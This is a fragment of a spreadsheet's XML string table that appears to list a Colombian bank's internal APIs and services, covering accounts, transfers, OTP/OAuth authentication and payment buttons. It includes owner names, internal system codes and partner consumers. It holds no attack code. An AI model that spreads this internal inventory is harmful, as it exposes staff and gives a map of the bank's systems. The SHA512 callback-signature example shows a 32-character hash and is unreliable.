  </si>
  <si>
    <t>Acceder Negociaciones De Divisas</t>
  </si>
  <si>
    <t xml:space="preserve">Permite conocer la disponibilidad del banco para hacer la negociación de divisas, acceder a las condiciones que ofrece el banco para efectuarla y consultar la historia de negociaciones realizadas entre el banco y el cliente._x005F_x000D_ </t>
  </si>
  <si>
    <t>NEGOCIOS_DE_INVERSION</t>
  </si>
  <si>
    <t>Productor Transversal</t>
  </si>
  <si>
    <t>MODULO PARAMETRIZADOR COMPRA Y VENTA DE DIVISAS TESORERIA_AW0899001</t>
  </si>
  <si>
    <t>SVE _x000D_
AW0360</t>
  </si>
  <si>
    <t>Accounts</t>
  </si>
  <si>
    <t>Account - Accounts</t>
  </si>
  <si>
    <t>account-accounts</t>
  </si>
  <si>
    <t>Permite conocer la información básica y detallada de las cuentas de ahorro o corrientes de un cliente Bancolombia.</t>
  </si>
  <si>
    <t>Depósitos</t>
  </si>
  <si>
    <t>Lina María Giraldo Ceballos
Juan David Velasquez Velez</t>
  </si>
  <si>
    <t>ConsultaCuentasDepositos/V1.0</t>
  </si>
  <si>
    <t>Depositós</t>
  </si>
  <si>
    <t>BC_Monitoreo_ProductorConsumidor_Depositos _x000D_
 CapaTrx_ProductorConsumidor _x000D_
 APPVinculation_AW1315014 _x000D_
 APP_PRODUCTORCONSUMIDOR _x000D_
 Deposits-Openshift_PRODUCTORCONSUMIDOR _x000D_
 FONDOS_AW1365 _x000D_
 Valores_AW1373 _x000D_
 PagoSinFriccionQrInteroperable_AW1315001 _x000D_
 JornadaDepositos_NU0104001 _x000D_
 GestorCanal_NU0014001 _x000D_
 Openshift_AW1333002_AccountCertificates _x000D_
 APP_PRODUCTORCONSUMIDOR _x000D_
 Decision-Manager_NU0010001 _x000D_
 PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 JornadaDepositos_NU0170001 _x000D_
 Horus_AW1258011 _x000D_
 CryptoAssetsGMN_NU0094001 _x000D_
 GESTION DE PRECIOS_NU0091001 _x000D_
 APP-PERSONAS_NU0146001 _x000D_
 APP_PRODUCTORCONSUMIDOR _x000D_
 APP_PRODUCTORCONSUMIDOR _x000D_
 BancolombiaPay_AW1435001 _x000D_
 TransaccionPago_AW0360006 _x000D_
 ALM_AW0955001 _x000D_
 APP_PRODUCTORCONSUMIDOR _x000D_
 RIGO_NU0135001 _x000D_
 JornadaDepositos_AW1177001 _x000D_
 APP_PRODUCTORCONSUMIDOR _x000D_
 Dcmonroy_prueba_paso _x000D_
 AdquirenciaCargaMasiva_NU0142001 _x000D_
 SEG_NU0064001</t>
  </si>
  <si>
    <t>API ONPMS INT</t>
  </si>
  <si>
    <t>Accounts AWS</t>
  </si>
  <si>
    <t>Account - Accounts AWS</t>
  </si>
  <si>
    <t>account-accounts-aws</t>
  </si>
  <si>
    <t>ALM_AW0955 _x000D_
 APPVinculation_AW1315014 _x000D_
 APP_PRODUCTORCONSUMIDOR _x000D_
 Openshift_AW1333002_AccountCertificates _x000D_
 Decision-Manager_NU0010001 _x000D_
 PRODUCTORCONSUMIDOR_PRODUCTORCONSUMIDOR _x000D_
 BC_Monitoreo_ProductorConsumidor_Depositos _x000D_
 LoansOffer_NU0102001</t>
  </si>
  <si>
    <t>Account - Balances</t>
  </si>
  <si>
    <t>account-balances</t>
  </si>
  <si>
    <t>La API Account - Balances permitirá a los diferentes consumidores poder obtener los diferentes saldos de manera detallada para los tipos de productos: CAA: Cuentas corrientes, SBA: Cuenta de ahorros que se posee en las Filiales del Exterior</t>
  </si>
  <si>
    <t>FILIALES_DEL_EXTERIOR_Y_ALIADOS</t>
  </si>
  <si>
    <t>Filiales del Exterior</t>
  </si>
  <si>
    <t>ConsultaSaldosCuentasDepositos/V1.0</t>
  </si>
  <si>
    <t>APP Cayman _x000D_
 Cayman_Soporte _x000D_
 TMP EDIN APP_AW1276001 _x000D_
 TEMP MAM_AW1204 _x000D_
 BC_Herramientas_Monitoreo _x000D_
 TMP1 johucorr_AW0360010 _x000D_
 APOLO_AW0360010 _x000D_
 App inversionesGB_AW1185001</t>
  </si>
  <si>
    <t>API Pro FE</t>
  </si>
  <si>
    <t>Account - Balances AWS</t>
  </si>
  <si>
    <t>account-balances-aws</t>
  </si>
  <si>
    <t>Permite realizar las consultas de saldos de una cuenta de depósito, se puede consultar por cuenta o por todas las cuentas de un cliente en particular.</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>Account - Fund Transfers</t>
  </si>
  <si>
    <t>account-fund-transfers</t>
  </si>
  <si>
    <t>La API Account - Fund Transfers habilita las capacidades relacionadas con los movimientos monetarios entre cuentas como, por ejemplo: débitos, créditos, transferencias y la anulación de cada uno de estos movimientos segíºn se requiera. Para las capacidades de crédito a cuenta y transferencia entre cuentas, se valida si la cuenta tiene alguna restricción como cuenta recaudadora.</t>
  </si>
  <si>
    <t>Account - Information</t>
  </si>
  <si>
    <t>account-information</t>
  </si>
  <si>
    <t>Permite consultar la información general de las cuentas de un cliente y las tarjetas asociadas a las cuentas. Información como saldos, estados, plazos, montos, entre otros</t>
  </si>
  <si>
    <t>Account - Management</t>
  </si>
  <si>
    <t>account-management</t>
  </si>
  <si>
    <t>Habilita las capacidades relacionadas con la gestión administrativa de una cuenta de depósito como, por ejemplo: la apertura de una cuenta de ahorros, realizar modificaciones sobre su estado, disponibilidad de saldos y confirmar información proporcionada sobre las cuentas.</t>
  </si>
  <si>
    <t>GestionDeCuentasDepositos/V1.0</t>
  </si>
  <si>
    <t>Account - Offers</t>
  </si>
  <si>
    <t>account-offers</t>
  </si>
  <si>
    <t>La API Account - Offers permite consultar la información de la oferta que ofrece el producto de depósitos como por ejemplo los planes actuales para cuentas de ahorro y corriente.</t>
  </si>
  <si>
    <t>OfertaCuentasDepositos/V1.0</t>
  </si>
  <si>
    <t>Account - Participants</t>
  </si>
  <si>
    <t>account-participants</t>
  </si>
  <si>
    <t>Esta Api lista los benefiarios que tiene una cuenta de un cliente.</t>
  </si>
  <si>
    <t>Account - Taxes</t>
  </si>
  <si>
    <t>account-taxes</t>
  </si>
  <si>
    <t>El API Account - Taxes permitirá marcar y desmarcar cuentas para que sean o no exentas del impuesto GMF (Gravamen a movimientos financieros). También permite consultar la marcación de la cuenta GMF</t>
  </si>
  <si>
    <t>ConsultaGMF/V1.0</t>
  </si>
  <si>
    <t>Account - Transfers</t>
  </si>
  <si>
    <t>account-transfers</t>
  </si>
  <si>
    <t>Habilita las capacidades relacionadas con los movimientos monetarios entre cuentas como, por ejemplo: débitos, créditos, transferencias y la anulación de cada uno de estos movimientos segíºn se requiera.</t>
  </si>
  <si>
    <t>TransferenciasCuentasDepositos/V1.0</t>
  </si>
  <si>
    <t>Accounts Foreign Branches</t>
  </si>
  <si>
    <t>Accounts Foreign Branches - Account Balances</t>
  </si>
  <si>
    <t>accounts-foreign-branches-account-balances</t>
  </si>
  <si>
    <t>La API Accounts Foreign Branches - Account Balances permite conocer los saldos consolidados de todos los tipos de productos que poseea un cliente en las filiales de exterior de Bancolombia. Los tipos de producto que maneja Finacle para las filiales del exterior son los siguientes: CAA: Cuentas corrientes, SBA: Cuenta de ahorros, LAA: Préstamo retail, CLA: Préstamo corporativo y TDA: Plazos fijos</t>
  </si>
  <si>
    <t>ConsultaSaldosConsolidadosFiliales/V1.0
ConsultaSaldosProductosConsolidados/V1.0</t>
  </si>
  <si>
    <t>TMP1 johucorr_AW0360010</t>
  </si>
  <si>
    <t>Accounts Reconciliation</t>
  </si>
  <si>
    <t>Accounts Reconciliation - Reconciliation Data Query</t>
  </si>
  <si>
    <t>accounts-reconciliation-data-query</t>
  </si>
  <si>
    <t>Api que permite  consultar a través de la identificación de un cliente, la información básica de las obligaciones, como lo es el numero de la obligacioó y el tipo de producto, ademas con las obligaciones se puede consultar los abogados que estan gestionando dichas obligaciones</t>
  </si>
  <si>
    <t>Transversales no iSeries</t>
  </si>
  <si>
    <t>Los Federales</t>
  </si>
  <si>
    <t>Ruben Dario Cardenas</t>
  </si>
  <si>
    <t>GestionConciliacionClientes/V1.0</t>
  </si>
  <si>
    <t>PORTALCOBRANZA_AW1294001</t>
  </si>
  <si>
    <t>ACHFulfillment</t>
  </si>
  <si>
    <t>ACHFulfillment - Transfers</t>
  </si>
  <si>
    <t>achfulfillment-transfers</t>
  </si>
  <si>
    <t>La API ACH Fulfillment - Transfers permitirá gestionar las operaciones asociadas a otros  bancos a traves del sistema ACH, las operaciones que se podran realizar a traves de esta API son las siguientes: - Inscribir beneficiario de otro banco para realizar transferencias - Realizar envio de transferencias a otros bancos - Anular transferencia a otros bancos</t>
  </si>
  <si>
    <t>MEDIOS_DE_PAGO</t>
  </si>
  <si>
    <t>Aceptación de Pagos</t>
  </si>
  <si>
    <t>Pagos</t>
  </si>
  <si>
    <t>Doreley Estrada Ramirez</t>
  </si>
  <si>
    <t>TransferenciasOtrosBancos/V1.0</t>
  </si>
  <si>
    <t>No tiene</t>
  </si>
  <si>
    <t>Activar Acuerdo Trade</t>
  </si>
  <si>
    <t>El servicio ActivarAcuerdoTrade proporciona la capacidad de negocio de apertura de productos de comercio internacional. Estos productos se agrupan en tres grandes categorías. Cartas de Crédito, Garantías Bancarias y Cobranzas.</t>
  </si>
  <si>
    <t>AW0611001 _x000D_
AW0795</t>
  </si>
  <si>
    <t>Activar CDT</t>
  </si>
  <si>
    <t xml:space="preserve">El Certificado de Depósito a Término (CDT), es un título valor en el cual el inversionista nos deposita su dinero a un plazo, a una tasa y a una forma de pago determinada, información que será recibida por el servicio de ActivarCDT_x005F_x000D_ </t>
  </si>
  <si>
    <t>Maria Isabel Gutierrez</t>
  </si>
  <si>
    <t>FINACLE 10.2.17_CDT_AW1078001</t>
  </si>
  <si>
    <t>SU2 _x000D_
CDT _x000D_
AW0210001 _x000D_
SVP _x000D_
SU5 _x000D_
SVE _x000D_
AW1218001</t>
  </si>
  <si>
    <t>Administracion Combo Dinamico</t>
  </si>
  <si>
    <t>El servicio Administración Combo Dinámico permitirá a los consumidores consultar los combos que un cliente tiene asociados, los combos de un cliente filtrados por un producto particular, la consulta de un combo en particular y la modificación de información del combo asociada a la apertura de los productos del combo</t>
  </si>
  <si>
    <t>CLIENTES</t>
  </si>
  <si>
    <t>Gestion Cliente y Comercial</t>
  </si>
  <si>
    <t>John Jairo Gaviria Escobar</t>
  </si>
  <si>
    <t>SAP CRM_Servicio_AW0623001</t>
  </si>
  <si>
    <t>No Tiene</t>
  </si>
  <si>
    <t>Administracion Convenios Cartera</t>
  </si>
  <si>
    <t>El servicio Administración Convenios Cartera tiene como objetivo permitir inicialmente la consulta de los diferentes tipos de convenios de cartera que existen como convenios de libranza, de seguros, DAI, ONG´s o fundaciones, etc. Más adelante se espera que el servicio pueda ir creciendo para permitir la creación, bloqueo y cancelación de un convenio de cartera.</t>
  </si>
  <si>
    <t>PRODUCTOS_DE_FINANCIACION</t>
  </si>
  <si>
    <t>Crédito</t>
  </si>
  <si>
    <t>Bankvision - BVL_Cartera moneda legal y extranjera_ISBVL0001</t>
  </si>
  <si>
    <t>AW1285001 _x000D_
AW0856 _x000D_
AW0360007</t>
  </si>
  <si>
    <t>Administracion ITC</t>
  </si>
  <si>
    <t xml:space="preserve">Servicio que permite el registro de transacciones en ITC (Información Transaccional de Clientes). Las transacciones reportadas a través de este servicio se verán reflejadas en los archivos consolidados de ITC un día después de la aplicación de la transacción._x005F_x000D_ </t>
  </si>
  <si>
    <t>CANALES_DIGITALES</t>
  </si>
  <si>
    <t>Trasversales e Inclusión</t>
  </si>
  <si>
    <t>ITC -  Información Transaccional de Clientes_Reportajes_ISITC0003</t>
  </si>
  <si>
    <t>AW1165</t>
  </si>
  <si>
    <t>Administracion Relacion Cliente Producto</t>
  </si>
  <si>
    <t>La relación cliente producto permite conocer y asociar cuales son los productos de un cliente . Este servicio permite ejecutar todas las acciones de mantenimiento de esta relación tales como: asociar un producto, actualizar una asociación, eliminar una asociación.</t>
  </si>
  <si>
    <t>NU0147001</t>
  </si>
  <si>
    <t>Administrar CDT</t>
  </si>
  <si>
    <t>El servicio tiene como propósito recuperar la información de un producto a partir de un número de CDT valido o los títulos de un cliente a partir del número y tipo de identificación.</t>
  </si>
  <si>
    <t>SU2 _x000D_
AW0210001 _x000D_
SVP _x000D_
GDE _x000D_
APP _x000D_
SU5 _x000D_
SVE</t>
  </si>
  <si>
    <t>Administrar Firma Documento</t>
  </si>
  <si>
    <t>APOYO_AL_NEGOCIO</t>
  </si>
  <si>
    <t>Facilitadores Digitales</t>
  </si>
  <si>
    <t>Cristian Camilo Villada Giraldo</t>
  </si>
  <si>
    <t>Administrative Module</t>
  </si>
  <si>
    <t>Administrative Module - File Notification</t>
  </si>
  <si>
    <t>administrative-module-file-notification</t>
  </si>
  <si>
    <t>En esta API se incluirán las diferentes funcionalidades que impliquen el envió de notificaciones hacia el módulo administrativo.</t>
  </si>
  <si>
    <t>CANALES_Y_CONTENIDOS_DIGITALES_PYMES</t>
  </si>
  <si>
    <t>Canales Pymes</t>
  </si>
  <si>
    <t>Administrative Module  Notifications</t>
  </si>
  <si>
    <t>tec-administrative-module-notifications</t>
  </si>
  <si>
    <t>GestionaNegocios_AW1302001 _x000D_
 BC_Herramientas_MonitoreoPrd _x000D_
 AppInversiones_AW1185001 _x000D_
 BilleteraMovil_AW1190001</t>
  </si>
  <si>
    <t>API TEC</t>
  </si>
  <si>
    <t>Adquirir Producto Seguro</t>
  </si>
  <si>
    <t>DESARROLLO_DE_SERVICIOS_E_INTEGRACION</t>
  </si>
  <si>
    <t>SOA y APIs</t>
  </si>
  <si>
    <t>Afectacion Monetaria AFC</t>
  </si>
  <si>
    <t xml:space="preserve"> El servicio requerido en el Broker es una virtualización de servicios que se van a exponer en AFC, relacionados con la transaccionalidad de Cuentas de Ahorro para el Fomento a la Construcción:_x005F_x000D_ _x005F_x000D_ - grabarPate _x005F_x000D_ - debitarCuenta</t>
  </si>
  <si>
    <t>CUENTAS AFC_AW1110001</t>
  </si>
  <si>
    <t>SAI _x000D_
AFC _x000D_
SUC _x000D_
GOLF _x000D_
AW1110001</t>
  </si>
  <si>
    <t>Afectacion Monetaria Cuentas ACH</t>
  </si>
  <si>
    <t>Transacción encargada de realizar transferencias entre cuentas Depósitos a cuentas ACH (Otros Bancos).</t>
  </si>
  <si>
    <t>AW1170</t>
  </si>
  <si>
    <t>Afectacion Monetaria Depositos</t>
  </si>
  <si>
    <t xml:space="preserve"> El servicio requerido en el Broker es una virtualización de servicios que se van a exponer en Bankvision, relacionados con la transaccionalidad de Cuentas de Ahorro/Corrientes:_x005F_x000D_ _x005F_x000D_ - acreditarCuenta_x005F_x000D_ - debitarCuenta_x005F_x000D_ - anularCredito_x005F_x000D_ - anularDebito_x005F_x000D_ - transferirFondosEntreCuentas_x005F_x000D_ - anularTransferenciaFondosEntreCuentas_x005F_x000D_ </t>
  </si>
  <si>
    <t>Leidy Yurany Guarin Lopez</t>
  </si>
  <si>
    <t>Cuentas AFC_AW1110001</t>
  </si>
  <si>
    <t>AW01065 _x000D_
APIC _x000D_
NU0017001 _x000D_
AW0638 _x000D_
AW1269001 _x000D_
AW1170 _x000D_
AFC _x000D_
NU0004001 _x000D_
AW1078001 _x000D_
AW1300001 _x000D_
AW1311 _x000D_
AW1365 _x000D_
AW1298001 _x000D_
AW1011 _x000D_
AW0638001 _x000D_
AW1110001</t>
  </si>
  <si>
    <t>Afectaciones Monetarias Tarjetas Credito</t>
  </si>
  <si>
    <t>El servicio Afectaciones Monetarias Tarjetas Crédito permite realizar, como su nombre lo indica, diferentes afectaciones monetarias sobre una tarjeta de crédito. Tales afectaciones incluyen:  • Pagar tarjeta de crédito con débito a cuenta • Pagar tarjeta de crédito de terceros • Pagar tarjeta de crédito con cuentas de otros bancos</t>
  </si>
  <si>
    <t>Emisor</t>
  </si>
  <si>
    <t>Digital Medios de Pago</t>
  </si>
  <si>
    <t>Julian David Arboleda Velez</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
AW1405001</t>
  </si>
  <si>
    <t>Almacenar Solicitud De Credito_BB11</t>
  </si>
  <si>
    <t>Permite a los consumidores enviar a Gestión Documental información relacionada con el cliente que hace la solicitud de un crédito de consumo.</t>
  </si>
  <si>
    <t>BB11_Generación de Solicitudes_RequestGeneration_AW0935001</t>
  </si>
  <si>
    <t>AW0499 _x000D_
AW1176 _x000D_
AW0922 _x000D_
AW0856</t>
  </si>
  <si>
    <t>Anulacion Factura Recaudo</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Anulación Factura Recaudo permitirá a los recaudadores hacer gestión sobre sus facturas 
 </t>
  </si>
  <si>
    <t>Pagos y Recaudos</t>
  </si>
  <si>
    <t>Recaudos</t>
  </si>
  <si>
    <t>Walter Andrés Gómez</t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
NU0084001</t>
  </si>
  <si>
    <t>Arquear Documentos</t>
  </si>
  <si>
    <t>Permite realizar el arqueo (custodia) de Documentos en Gestión Documental, posterior al consumo del servicio BB7 correspondiente al Envío y Recepción de documentos.</t>
  </si>
  <si>
    <t>Oracle ECM_UCM - Universal Content Management_AW0494001</t>
  </si>
  <si>
    <t>AW0682001</t>
  </si>
  <si>
    <t>Asignar Primera Segunda Clave SVP</t>
  </si>
  <si>
    <t>Permitir que un cliente de Filiales del Exterior genere su primera o segunda clave única de cliente en la (SVP) Sucursal Virtual Personas para Filiales del Exterior.</t>
  </si>
  <si>
    <t>IAM</t>
  </si>
  <si>
    <t>AW0718001</t>
  </si>
  <si>
    <t>Autenticacion Cliente</t>
  </si>
  <si>
    <t>El servicio habilita la autenticación de clientes Bancolombia del segmento personas que tengan un nombre de usuario registrado para cualquiera de los canales.</t>
  </si>
  <si>
    <t>FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001</t>
  </si>
  <si>
    <t>AW1128 _x000D_
NU0051001 _x000D_
AW1291001 _x000D_
DEVELOPSOATEST</t>
  </si>
  <si>
    <t>Autenticacion Cliente DIAN</t>
  </si>
  <si>
    <t>Este servicio está orientada a la habilitación de la interoperabilidad con los sistemas Muisca de la DIAN. Describe los mecanismos y requerimientos para que un sistema externo (aplicación) pueda obtener un token de acceso para el consumo de servicios de la entidad.</t>
  </si>
  <si>
    <t>Recaudos o Gobierno e Impuestos</t>
  </si>
  <si>
    <t>DIAN</t>
  </si>
  <si>
    <t>AW01065</t>
  </si>
  <si>
    <t>Autenticacion Oauth</t>
  </si>
  <si>
    <t>El Componente de Integración Autenticación Oauth, comprende la especificación de implementación requerida para el procesamiento de los consumos realizados por parte del servicio de Oauth 2.0, con el objetivo de realizar el proceso de autenticación de los clientes que hacen uso de las APIs expuestas por el Banco a través de API Connect.  Este componente hace uso de la capacidad entregada en el iSeries encargado de realizar la generación / validación de PINES. Dicha Capacidad se encuentra virtual izada en Broker. Una vez validado el OTP se recupera información básica del cliente como el Nombre y Apellido relacionados al OTP.</t>
  </si>
  <si>
    <t>Giros Nacionales_AW1227001</t>
  </si>
  <si>
    <t>Autenticacion Sufi</t>
  </si>
  <si>
    <t>El servicio AutenticacionSufi permitirá a los consumidores autenticar a un usuario registrado en sufi.</t>
  </si>
  <si>
    <t>Sufi</t>
  </si>
  <si>
    <t>Leidy Johanna Moreno Pelaez</t>
  </si>
  <si>
    <t>Servicio Web Cliente Sufi_AW1083001</t>
  </si>
  <si>
    <t>AW1209001</t>
  </si>
  <si>
    <t>Autenticar Cliente OTP</t>
  </si>
  <si>
    <t>Colombia. Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID. El servicio AutenticarClienteOTP permite la validación de un OTP generado a un cliente desde la plataforma de clave dinámica Detect ID</t>
  </si>
  <si>
    <t>ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI</t>
  </si>
  <si>
    <t>Seguridad</t>
  </si>
  <si>
    <t>Autorizaciones</t>
  </si>
  <si>
    <t>Daniel Esteban Ramirez Correa</t>
  </si>
  <si>
    <t>Cyxtera</t>
  </si>
  <si>
    <t>APIC _x000D_
AW1177 _x000D_
AW0937 _x000D_
AW0748001 _x000D_
AW1170 _x000D_
AW1287001 _x000D_
NU0101001 _x000D_
NU0004001 _x000D_
AW1287 _x000D_
AW1128 _x000D_
AW1011 _x000D_
AW1185001 _x000D_
NU0100001 _x000D_
AW1316001 _x000D_
AW1277001 _x000D_
DEVELOPSOATEST _x000D_
NU0199001</t>
  </si>
  <si>
    <t xml:space="preserve">Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID. El servicio AutenticarClienteOTP permite la validación de un OTP generado a un cliente desde la plataforma de clave dinámica Detect ID_x005F_x000D_ </t>
  </si>
  <si>
    <t>AW0638</t>
  </si>
  <si>
    <t>Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID.  El servicio AutenticarClienteOTP permite la validación de un OTP generado a un cliente desde la plataforma de clave dinámica Detect ID</t>
  </si>
  <si>
    <t>NU0100001</t>
  </si>
  <si>
    <t>Autenticar Compra VCAS</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio se encargara de realizar la autenticación para la compra en comercios seguros directamente con Cardinal. identificando al cliente, y usando el segundo factor de autenticación según convenga
</t>
  </si>
  <si>
    <t>NU0101001</t>
  </si>
  <si>
    <t>Autenticar Usuario</t>
  </si>
  <si>
    <t>Este servicio se encarga de autenticar usuarios por medio de su documento de identificación y su PIN (primera clave), actualmente es utilizado por Ventas por Internet (Todo1).</t>
  </si>
  <si>
    <t>Jornadas</t>
  </si>
  <si>
    <t>VENTAS POR INTERNET_SECURITY SESSION MANAGER (SSM)_AW1013001</t>
  </si>
  <si>
    <t>AW1177 _x000D_
AW1170 _x000D_
AW1128</t>
  </si>
  <si>
    <t>Authorization</t>
  </si>
  <si>
    <t>Authorization - Access Authorization</t>
  </si>
  <si>
    <t>authorization-access-authorization</t>
  </si>
  <si>
    <t>API que permite obtener el token de autorización para el consumo de APIs píºblicas y partner aseguradas con OAuth2.0</t>
  </si>
  <si>
    <t>Gestión de Identidades</t>
  </si>
  <si>
    <t>Mariluz Velasquez Suarez</t>
  </si>
  <si>
    <t>pruebaBancolmbiaButton _x000D_
 PruebasIntegración _x000D_
 APP D Y S _x000D_
 FACTURE PAY _x000D_
 ALCALDIA DE MANIZALES _x000D_
 TRANSFIRIENDO _x000D_
 BANCOLOMBIAPAY APP _x000D_
 Moneygram_MNR _x000D_
 Botón _x000D_
 MONET COLOMBIA SAS</t>
  </si>
  <si>
    <t>API ONPMS EXT</t>
  </si>
  <si>
    <t>Authorization Services</t>
  </si>
  <si>
    <t>Componente encargado de la autenticación de los clientes, haciendo uso de flujo OAuth Resource Owner Password Credentials, también permite el enrolamiento y autenticación con factor biométrico local. Para todos los casos se genera un token de acceso con el cual se controla la sesión del canal y la autorización en Security Filters a los recursos. Adicionalmente se expone la capacidad de validación de token de acceso vía instrospección.</t>
  </si>
  <si>
    <t>ALM</t>
  </si>
  <si>
    <t>Bancolombia Button</t>
  </si>
  <si>
    <t>Bancolombia Button - Transference Management</t>
  </si>
  <si>
    <t>bancolombia-button-transference-management</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permite que un comercio pueda registrar una intención de compra, para pagar a través de Botón Bancolombia, obteniendo como resultado un identificador de dicha intención. Después de registrar la intención de compra, el comercio podrá consultar el estado de la transferencia con el identificador que se retornó en el primer momento. </t>
  </si>
  <si>
    <t>Servicios Transaccionales MP</t>
  </si>
  <si>
    <t>Boton de Transferencias_AW1277001</t>
  </si>
  <si>
    <t>WOMPI _x000D_
 BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>API Pro</t>
  </si>
  <si>
    <t>Capacidades funcionales que tienen como objetivo apoyar un nuevo medio de pago virtual denominado Botón de Transferencias Bancolombia</t>
  </si>
  <si>
    <t>TIGOUNE _x000D_
 Tuya _x000D_
 Tigo une prueba APP _x000D_
 VIRGINMOBILEAPP _x000D_
 Baguer SAS _x000D_
 SERVICIOS DE SALUD IPS SURAMERICANA S.A.S. _x000D_
 OPERACIONES GENERALES SURAMERICANA SAS _x000D_
 SERVICIOS GENERALES SURAMERICANA S.A.S. _x000D_
 CONSULTORIA EN GESTION DE RIESGOS SURAMERICANA _x000D_
 SEGUROS GENERALES SURAMERICANA SA _x000D_
 SEGUROS DE VIDA SURAMERICANA SA _x000D_
 EPS SURAMERICANA S.A. _x000D_
 FONYOU COLOMBIA SAS _x000D_
 INVERSORA EBCO APP _x000D_
 ABC PAGOS _x000D_
 LYRAAPP _x000D_
 CLAROAPP _x000D_
 SUPERPAGOSAPP _x000D_
 ZONA PAGOS _x000D_
 Place to Pay _x000D_
 T atiendo Boton Bancolombia _x000D_
 Boton Bancolombia _x000D_
 E-collect _x000D_
 App_Blendex_BotonBancolombia _x000D_
 ofrendaappbc _x000D_
 ALKOSTO BOTON BANCOLOMBIA _x000D_
 WOMPI APP _x000D_
 BC_Herramientas_MonitoreoPrd _x000D_
 COMFAMA APP _x000D_
 SISTECREDITO SAS _x000D_
 PAYMENTEZ APP _x000D_
 FONVALMED</t>
  </si>
  <si>
    <t>Botón Bancolombia ofrece varias funcionalidades que permiten a los comercios procesar transacciones y conocer su estado en lí­nea **Funcionalidades** - Realizar transferencias entre cuentas de ahorro y corriente Bancolombia para ventas digitales. - Hacer consultas del estado de las transacciones. **Datos de prueba** Para realizar pruebas del producto de APIs de Botón Bancolombia puede utilizar los datos que se encuentran en el siguiente archivo: [Datos de prueba](https://cocapis.s3.us-east-2.amazonaws.com/assets/imagenes+familias/BC-OBA-CP-BancolombiaButton+v1.4.4.xlsx) **Callback** Funcionalidad que nos permite notificarle al comercio o a la pasarela de pago el resultado final de la transacción. Para habilitar esta opción, es necesario enviar la URL de notificación en el campo 'confirmationURL' de la operación POST 'registry', en caso de no enviarla, no se llevará a cabo. **Importante:** Todos los campos se enví­an como **String** pero se respeta el tipo de dato que se muestra a continuación: **Campos que se enví­an en el Callback** / **Campo** / **Tipo** / **Longitud máxima** / **Descripción** / / --- / --- / --- / --- / / transferVoucher / String / 50 / Níºmero de comprobante de la transacción. / / transferAmount / Double / 15 / Monto de la transacción / / transferStateDescription / String / 225 / Descripción del resultado de la transacción / / sign / String / 128 / Firma que permitirá validar la integridad del request generado por Bancolombia / / requestDate / DateTime / 23 / Fecha en la que se registró la orden / / transferState / String / 20 / Estado de la transacción / / transferDate / Date / 20 / Fecha en la que se aprobó o rechazó la transacción. / / transferCode / String / 50 / Identificador íºnico de la transferencia / / transferReference / String / 48 / Código de referencia de la transacción para el comercio. / / commerceTransferButtonId / String / 50 / HASH que identifica el Botón Bancolombia del comercio / **Â¿Cómo generar el sign?** Para generar este valor, debe concatenar los siguientes valores: [apiKey~commerceTransferButtonId~transferCode~tranferAmount~transferState] Una vez concatenados debe cifrar utilizando el algoritmo SHA512. Por ejemplo, al concatenar los datos mencionados debe obtener algo muy similar a esto: 5Fj8eK4rlyUd252L48herdrnEO~w0mp1B0toN~\_CeoHUM7C65~200.00~rejected Y al crear el HASH de la cadena resultante, debe obtener el sign como se muestra a continuación: b6f7bc914b69824df799db0ad7c9bb26 [Bancolombia API Working Group - Website](https://developer.bancolombia.com/contact) [Send email to Bancolombia API Working Group](mailto:apigroup@bancolombia.com.co)</t>
  </si>
  <si>
    <t>Tarjetas Crédito</t>
  </si>
  <si>
    <t>Deisy Tatiana Quintero</t>
  </si>
  <si>
    <t>pruebaBancolmbiaButton _x000D_
 PruebasIntegración _x000D_
 APP D Y S _x000D_
 MonitoreoDCM_AAA _x000D_
 FACTURE PAY _x000D_
 ALCALDIA DE MANIZALES _x000D_
 TRANSFIRIENDO _x000D_
 Botón</t>
  </si>
  <si>
    <t>BancolombiaPay</t>
  </si>
  <si>
    <t>BancolombiaPay - Customer</t>
  </si>
  <si>
    <t>bancolombiapay-customer</t>
  </si>
  <si>
    <t>Esta API cuenta con capacidades que permiten verificar la viabilidad de una persona, autenticándola mediante un token de OTP y enviarle los términos y condiciones para que este los acepte y pueda acceder a los servicios de BancolombiaPay.</t>
  </si>
  <si>
    <t>Bancolombia Pay</t>
  </si>
  <si>
    <t>Maria Camila Zapata</t>
  </si>
  <si>
    <t>BANCOLOMBIAPAY APP _x000D_
 MONET COLOMBIA SAS</t>
  </si>
  <si>
    <t>BancolombiaPay - OTP</t>
  </si>
  <si>
    <t>bancolombiapay-otp</t>
  </si>
  <si>
    <t>Permite Validar el codigo de unico uso que se envia al cliente como segundo valor de autenticacion.</t>
  </si>
  <si>
    <t>BancolombiaPay - Terms</t>
  </si>
  <si>
    <t>bancolombiapay-terms</t>
  </si>
  <si>
    <t>Permite desplegar los terminos y condiciones que fueron acordados entre el aliado y Bancolombia.</t>
  </si>
  <si>
    <t>BancolombiaPay - Wallet</t>
  </si>
  <si>
    <t>bancolombiapay-wallet</t>
  </si>
  <si>
    <t>Esta API permite gestionar la información asociada a la billetera que hace parte del servicio de BancolombiaPay.</t>
  </si>
  <si>
    <t>BancolombiaPay - Wallet Balance</t>
  </si>
  <si>
    <t>bancolombiapay-wallet-balance</t>
  </si>
  <si>
    <t>API que permite consultar el saldo de una cuenta.</t>
  </si>
  <si>
    <t>BancolombiaPay - Wallet Payment</t>
  </si>
  <si>
    <t>bancolombiapay-wallet-payment</t>
  </si>
  <si>
    <t>Esta API permite a los clientes realizar el pago de productos o servicios desde una canal de un tercero.</t>
  </si>
  <si>
    <t>Bank Account</t>
  </si>
